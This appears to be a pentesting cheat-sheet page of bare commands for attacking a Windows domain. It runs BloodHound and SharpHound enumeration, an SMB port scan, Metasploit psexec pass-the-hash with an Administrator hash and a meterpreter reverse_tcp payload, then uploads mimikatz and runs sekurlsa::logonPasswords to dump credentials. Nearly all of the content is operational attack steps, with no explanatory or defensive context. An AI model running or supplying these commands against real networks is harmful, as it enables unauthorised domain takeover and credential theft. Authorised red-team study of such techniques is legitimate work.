Bloodhound
// installation on kali
apt install bloodhound
neo4j console
. .\Sharphound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain TestDomain.local -ZipFileName results.zip
apt-get install bloodhound
neo4j console &
http://localhost:7474
upload sharphound.exe
execute -f sharphound.exe
download SOMETHING.zip
bloodhound
background session [y]
session -l
use auxilary/scanner/port/tcp
set port 445
set rhosts
set threads 20
run
use exploit windows/smb/psexec
set rhosts
set SMbuser Administrator
set SMBpass hash
set payload windows/meterpreter/reverse_tcp
set LHOST
set lport 4445
getuid
upload /usr/share/mimikatz/x64/mimikatz.exe
shell
mimikatz
privilege::debug
sekurlsa::logonPasswords full
Last updated
Was this helpful?